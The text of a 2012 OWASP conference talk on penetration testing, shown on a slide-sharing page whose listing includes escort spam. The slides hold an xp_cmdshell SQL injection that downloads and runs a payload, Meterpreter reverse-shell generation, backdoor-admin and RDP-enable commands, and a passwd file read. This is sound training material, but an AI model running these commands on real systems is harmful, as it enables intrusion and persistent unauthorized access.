08448380779 Call Girls In Friends Colony Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
Integration and Automation in Practice: CI/CD in Mule Integration and Automat...
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?How to Remove Document Management Hurdles with X-Docs?
How to Remove Document Management Hurdles with X-Docs?
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Key Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptxKey Features Of Token Development (1).pptx
Key Features Of Token Development (1).pptx
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 

Public exploit held private : Penetration Testing the researcher’s way

  • 1. OWASP InfoSec India Conference 2012 August 24th – 25th, 2012 The OWASP Foundation Hotel Crowne Plaza, Gurgaon http://www.owasp.org http://www.owasp.in Public exploit held private : Penetration Testing the researcher’s way Tamaghna Basu GCIH, OSCP, RHCE, CEH, ECSA tamaghna.basu@gmail.com OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
  • 2. DISCLAIMER! This presentation contains materials on the evolution of a pen tester which is solely based on the perspective of the speaker which might contradict with opinions of individuals. All the scenarios explained here are fictional even though they might resemble to realistic situations. Even though no harm intended, if it causes any discomfort to you spiritually and/or physically, the speaker, organizers, hotel authority, climate control people and the person sitting next to you will not be responsible for that. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 2
  • 3. Setting the context Why Pentesting? How do you do it?  To VA or to PT… That’s the question. OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 3
  • 4. Setting the context  Terminologies  Vulnerability  Exploit  Payload  Reverse shell OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 4
  • 5. Basics Pentesting  Internal  External  Automated -> review the report -> get the final report  Manual -> run few basic tools -> get the report done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 5
  • 6. Basics… Pentesting Steps  Recon and Scanning  Exploit  Maintain Access  Clean up OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 6
  • 7. Scanning Why?  Identify the live hosts  OS fingerprinting  Service fingerprinting OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 7
  • 8. Scanning Desi Jugaad  Ping sweep / shell scripts  Decent tools (But indecent usage)  NMAP (behold the power of NSE)  Others? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 8
  • 9. Desi Jugaad (Local Hack) Ping Sweep Windows FOR /L %i in (1,1,255) do @ping -n 1 192.168.153.%i | find "Reply“ Linux #!/bin/bash for ip in $(seq 1 254); do ping -c 1 192.168.15.$ip | grep "bytes from" | cut -d" " -f 4 | cut -d":" -f 1 & done OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 9
  • 10. Scanning Problem!  It is taking too long to scan, need to go for lunch…  Is it really a windows box but looks like a Linux box? Or which version? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 10
  • 11. Desi Jugaad  Nmap  nmap –sV 192.168.15.201  nmap –O 192.168.15.201  nmap –A 192.168.15.201  nmap –p 1-65535 –sV 192.168.15.201  Nmap –p T:80 192.168.15.200-250  Zenmap  Unicorn scan - us -H -msf -Iv 192.168.13.201 -p 1- 65535 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)
  • 12. Nmap Scripts /usr/locale/share/nmap/scripts OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 12
  • 13. Nmap Scripts • Shared files and folders • nmap --script=smb-enum-shares 192.168.80.129 • Check for SMB vulnerabilities • nmap --script=smb-check-vulns 192.168.80.129 • Scan for machines that use default Ms sql username,password • nmap --script=ms-sql-info 192.168.80.129 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 13
  • 14. Scanning I have Nessus. Why to go through so much pain? I don’t have Nessus. What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 14
  • 15. Exploit  Motive  To gain access  Data  Command execution  Destroy everything!  Categories  Service level  OS OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 15
  • 16. Exploit What to exploit?  FTP?  HTTP?  SNMP?  What else? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 16
  • 17. Exploit  FTP  Server Exploit – Buffer Overflow  Fuzzing???  Bruteforce SNMP  What to do? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 17
  • 18. FTP Tips Windows echo open 192.168.12.124 > ftp.txt echo ftp>> ftp.txt echo ftp>> ftp.txt echo bin >> ftp.txt echo get met2.exe >> ftp.txt echo bye >> ftp.txt ftp -s:ftp.txt OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 18
  • 19. FTP Tips Linux echo quote user ftp>> ftp.txt quote user ftp echo quote pass ftp>>ftp.txt echo verbose>>ftp.txt echo binary >> ftp.txt echo get exploit.c >> ftp.txt echo bye >> ftp.txt cat ftp.txt|ftp -n 192.168.12.124 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 19
  • 20. Exploit  HTTP  Server Exploit  Command Execution  Web Shells  SQLi OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 20
  • 21. HTTP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 21
  • 22. SQLi Tips ' or 1=1;exec master..xp_cmdshell 'echo open 192.168.12.124> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo test>> ftpmet.txt';exec master..xp_cmdshell 'echo bin>> ftpmet.txt';exec master..xp_cmdshell 'echo get met.exe>> ftpmet.txt';exec master..xp_cmdshell 'echo bye';exec master..xp_cmdshell 'ftp - s:ftpmet.txt';exec master..xp_cmdshell 'met.exe';-- OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 22
  • 23. SQLi Tips My SQL non-interactive  "mysql --host=127.0.0.1 --user=root -- password=‘password' -e "use mysql; show tables;"  "mysql --host=127.0.0.1 --user=root -- password=‘password' -e "SELECT LOAD_FILE('/etc/passwd') INTO dumpfile '/tmp/passwd';" OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 23
  • 24. Exploit  Metasploit  Use Exploit  Set payload  exploit  Any other options? How about writing own exploit (at free time) (out of scope) OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 24
  • 25. L33t love story  Exploit’s love letter to the machine  PAYLOAD… Which courier?  MSF – set payload  Custom program – msfpayload  Bad characters  Executable - msfpayload OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 25
  • 26. Payload Generator  meterpreter msfpayload options: ./msfpayload windows/meterpreter/reverse_tcp O Create exe: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 X > /var/ftp/met.exe Generate shellcode: ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.14.15 LPORT=4321 C OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 26
  • 27. From msf: use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.1.40 set LPORT 80 show options exploit OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 27
  • 28. Exploit I am in, what to do?  Secure access?  Add user  Open a port  I like it the reverse way  meterpreter  Dude, did you get root/admin acces? OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 28
  • 29. Add User  Windows Shell net user hacker hacker123 /add net localgroup administrators hacker /add  Meterpreter use incognito add_user hacker hacker123 add_localgroup_user Administrators hacker  RDP enable reg add "HKEY_LOCAL_MACHINESYSTEMCurrentControlSet ControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 29
  • 30. Privilege Escalation  Categories  Service level  OS Problem!  How can I transfer my exploit there?  Netcat  FTP OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 30
  • 31. Kernel Exploits  Linux Kernel <= 2.6.36-rc8 http://www.exploit- db.com/exploits/15285/  Linux Kernel 2.4/2.6 http://www.exploit- db.com/exploits/9545/  Linux Kernel 2.6 http://www.exploit- db.com/exploits/8478/  Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 http://www.exploit-db.com/exploits/9844/ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 31
  • 32. Windows Exploits  Windows Vista, 7, 2008 http://www.exploit- db.com/exploits/15609/  Windows XP, 2003 http://www.exploit- db.com/exploits/18176/  Linux + NT priv esc http://www.exploit- db.com/exploits/9301/  Windows XP SP2, SP3 http://www.exploit- db.com/exploits/9301/ OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 32
  • 33. Pivoting…  Huh? Why do I need it? How do I do it?  nc + port forwarding  Ssh tunneling OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 33
  • 34. Fuzzing…  My favorite but last thing I prefer to do on my own  Python rocks!  Basic  Advanced  SEH handler  Egg hunting shellcode OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 34
  • 35. Did I miss anything?  Questions  Perspectives  Comments tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India) 35
  • 36. Thank you tamaghna.basu@gmail.com twitter.com/titanlambda linkedin.com/in/tamaghnabasu 36 OWASP InfoSec India Conference 2012. Hotel Crowne Plaza, Gurgaon (India)